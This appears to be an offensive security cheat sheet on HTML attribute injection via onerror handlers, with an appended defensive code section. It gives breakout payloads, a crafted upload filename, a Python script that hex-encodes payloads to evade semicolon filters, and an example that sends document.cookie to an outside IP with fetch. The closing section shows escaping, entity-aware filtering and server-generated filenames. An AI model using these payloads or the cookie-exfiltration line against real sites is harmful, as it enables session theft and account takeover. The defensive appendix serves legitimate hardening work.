HTML Injection

The OnError Bypass Method

The onerror event handler is one of the most reliable HTML injection techniques because the browser fires it automatically as soon as the element's resource (for example an image src) fails to load; no user interaction is needed.

This makes it ideal for bypassing input filters that don't sanitize quotes, because a single double quote is enough to break out of the attribute and add the handler.

Basic Syntax Structure
x" onerror="PAYLOAD" x="

Breakdown

  1. x" - Closes the current HTML attribute value

  2. onerror="" - Injects the JavaScript event handler

  3. x=" - Opens a new attribute to maintain valid HTML syntax

File Upload Context

When a user uploads a file, the stored filename is echoed unescaped into the src attribute of the template below. We can exploit this with a crafted filename: the quote closes the src value and the rest of the name becomes extra attributes, giving the rendered tag the onerror="" and x="" attributes shown here:

<img src="<?php echo $cat['photo_path']; ?>" alt="x" onerror="" x="" class="cat-photo">

Trigger the Error

Content-Disposition: form-data; name="cat_photo"; filename="x\"onerror=\"[encoded_payload]\" x=\".png"
Content-Type: image/png

GIF89a;
test

Context-Aware Payload Construction

For HTML attribute injection:

filename" onerror="alert(document.domain)" x="

For content injection:

<img src=x onerror="alert(1)">

When dealing with filename injection:

malicious" onerror="payload" x=".txt

For text inputs rendered in HTML:

test" onmouseover="alert(document.cookie)" x="

Common characters that may be filtered:

  • Parentheses () - Required for JavaScript function calls

  • Semicolons ; - Used to terminate JavaScript statements

  • Quotes ' - May be filtered while " is not

  • Angle brackets <> - HTML tag delimiters

Bypass Using HTML Hex Encoding

Python encoding script (each character becomes a hex numeric character reference; the trailing semicolon is left out on purpose so that a filter blocking ; is not triggered):

#!/usr/bin/python3
import sys


def encode(payload):
    # Emit every character as &#xNN (hex numeric character reference).
    # The ';' terminator is deliberately omitted: browsers still decode the
    # reference, but a filter that rejects ';' never sees one.
    output = ''
    for character in payload:
        output += '&#x' + hex(ord(character))[2:]
    return output


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f'[!] Usage: {sys.argv[0]} <payload>')
        sys.exit(1)
    print(encode(sys.argv[1]))

Example:

python3 encode.py "fetch('http://10.10.14.91:8000/?cookie=' + document.cookie);"

CyberChef recipe example (same encoding, with the ; terminators stripped by a Find / Replace step):

https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity(true,'Hex%20entities')Find_/_Replace(%7B'option':'Regex','string':';'%7D,'',true,false,true,false)&input=ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC45MTo4MDAwLz9jb29raWU9JyArIGRvY3VtZW50LmNvb2tpZSk7&ieol=CRLF&oeol=FF
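The upload context and the hex-entity bypass above, looked at from the defending side: an added example that is not part of these notes. The `<img>` template, the allow-listed extensions and the sample filename are assumptions; it shows why a filter must decode entities before inspecting input, and that escaping on output (or not reusing the client filename at all) neutralises the attribute breakout.

```python
import html
import secrets
from pathlib import PurePosixPath

# Constructed sample filename following the breakout pattern described above.
BREAKOUT_FILENAME = 'x" onerror="alert(1)" x=".png'
BLOCKED_CHARS = set('"\'<>();')
ALLOWED_EXT = {'.png', '.jpg', '.jpeg', '.gif'}   # assumed upload policy


def hex_entity_encode(text: str, semicolons: bool = True) -> str:
    """Hex numeric character references; semicolons=False matches the page's script."""
    terminator = ';' if semicolons else ''
    return ''.join(f'&#x{ord(ch):x}{terminator}' for ch in text)


def render_img_unsafe(photo_path: str) -> str:
    """Vulnerable pattern: the stored filename is concatenated into the src attribute."""
    return f'<img src="{photo_path}" alt="x" class="cat-photo">'


def render_img_safe(photo_path: str) -> str:
    """Output-side fix: quote=True turns '"' into &quot;, so the attribute value
    cannot be closed early (PHP equivalent: htmlspecialchars($path, ENT_QUOTES))."""
    return f'<img src="{html.escape(photo_path, quote=True)}" alt="x" class="cat-photo">'


def contains_blocked(value: str, decode_entities: bool = True) -> bool:
    """Character filter. With decode_entities=True the value is normalised with
    html.unescape first, which also resolves references lacking the ';' terminator,
    so entity-encoded input is inspected as the browser will actually see it."""
    checked = html.unescape(value) if decode_entities else value
    return any(ch in BLOCKED_CHARS for ch in checked)


def storage_name(upload_name: str, token: str = '') -> str:
    """Strongest fix: never reuse the client-supplied name. Keep only an
    allow-listed extension and generate the basename on the server."""
    ext = PurePosixPath(upload_name).suffix.lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f'extension not allowed: {ext!r}')
    return (token or secrets.token_hex(16)) + ext
```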
